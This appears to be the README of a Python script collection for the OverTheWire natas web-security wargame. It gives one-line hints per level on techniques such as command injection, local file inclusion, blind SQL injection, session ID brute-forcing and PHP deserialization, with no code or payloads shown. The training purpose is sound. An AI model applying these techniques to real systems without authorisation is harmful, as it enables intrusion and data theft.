Help scripts and writeup for natas challenges hosted by OverTheWire
All scripts have been written in Python 3.6.
The primary goal of this repository is showing how to use Python in CTF challenges. That's why the passwords are not written in the credentials file: at least try the scripts!
There is a plethora of specialized libraries and frameworks for penetration testing, but for didactic purposes, we will use only the Python's standard library.
The file natas.json contains the credentials for each level. Scripts automatically read the correct credentials. As you progress you can write here the found flags. Each script can be run on its own, without any dependency.
Here you will learn how to make a basic HTTP request with basic authentication and how to fetch the results.
Apparently natas0 was meant to be done using a GUI web browser, because this challenge is exactly the same, but the right-click has been deactivated.
Here you will learn how to list directories and inspect its content.
One of the comments in the code hints you to look for a robots.txt file. Using what you learned, you will be able to figure out how to navigate the site to extract the password from a file.
The site checks from which page the request came by means of the Referer
header. Use this to your advantage.
In this challenge you will have to manipulate a cookie to continue.
Use what you learned to inspect the included PHP files.
Use the hints in the code to perform a Local File Inclusion.
Look for the encoded secret and the function to generate it. You will get familiar with base64 and hexadecimal conversions.
Here you will face a pretty obvious case of command injection.
Similar to the previous challenge, but you will have to dodge a lousy input validation.
This case is a classical case of predictable encryption: you can use the default value of the cookie to find the pattern in the encryption algorithm.
In this challenge the uploaded file is not being validated at all. Use it to your advantage.
Now the fyletype is checked, but this is not enough to stop you, or is it?
SQL Injection 101
Another SQL injection where you will have to use conditionals to guess the password letter by letter.
Knowing that the value of one of the fields can be executed is key.
Blind SQL injection. Here the only hint it the processing time of the request.
A poorly designed session ID assignation, that can be brute-forced.
Another version of the prior challenge.
Yet another version of the same challenge.
Another weak session ID generator, but this time the vulnerability is not in the main page, making this a sort of side-channel exploitation.
The page in this challenge keeps redirecting us somewhere else to distract us from its flaws.
In this challenge you will see how to exploit weak typing in PHP.
Here the backend seems to be implemented in C, and inspecting the manpages of certain string-handling functions will give you the hints you need.
This one is fun. You will have to bypass several basic input validations to build up to a LFI.
Object deserialization can be used to inject code in PHP too.
Use a truncation issue in SQL to bypass some control conditions.
Remember the predictable session IDs? Weak encryption algorithms are exactly as bad.
In this challenge you will have your first contact with vulnerable Perl calls.
There is a way to bypass the quote() function in perl.
This is a complex challenge. You will have to search for the CCC presentations titled "The Perl Jam" where it is explained why Perl is not a suitable language for the web.
There is a perl script that can execute whatever you give as an argument.
There is a way to exploit the PHP function md5_file().